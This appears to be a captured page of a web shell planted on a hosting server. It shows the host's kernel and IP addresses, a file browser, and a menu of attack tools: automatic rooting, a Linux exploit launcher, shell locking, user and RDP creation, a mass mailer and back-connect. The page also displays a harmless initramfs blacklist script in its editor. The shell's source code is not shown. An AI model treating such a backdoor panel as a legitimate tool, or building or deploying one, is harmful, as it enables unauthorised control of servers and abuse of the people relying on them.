Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.214.161
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-top /
[ HOME SHELL ]
Name
Size
Permission
Action
all_generic_ide
384
B
-rwxr-xr-x
blacklist
519
B
-rwxr-xr-x
console_setup
3.34
KB
-rwxr-xr-x
framebuffer
3.16
KB
-rwxr-xr-x
udev
568
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blacklist
#!/bin/sh PREREQ="" prereqs() { echo "$PREREQ" } case $1 in # get pre-requisites prereqs) prereqs exit 0 ;; esac # blacklist vga16fb when vga= or video= given # shellcheck disable=SC2013 for x in $(cat /proc/cmdline); do case ${x} in vga=*|video=*) echo "blacklist vga16fb" >> /etc/modprobe.d/initramfs.conf ;; esac done # sanity check [ -z "${blacklist?}" ] && exit 0 # write blacklist to modprobe.d IFS=',' for b in ${blacklist}; do echo "blacklist $b" >> /etc/modprobe.d/initramfs.conf done
Close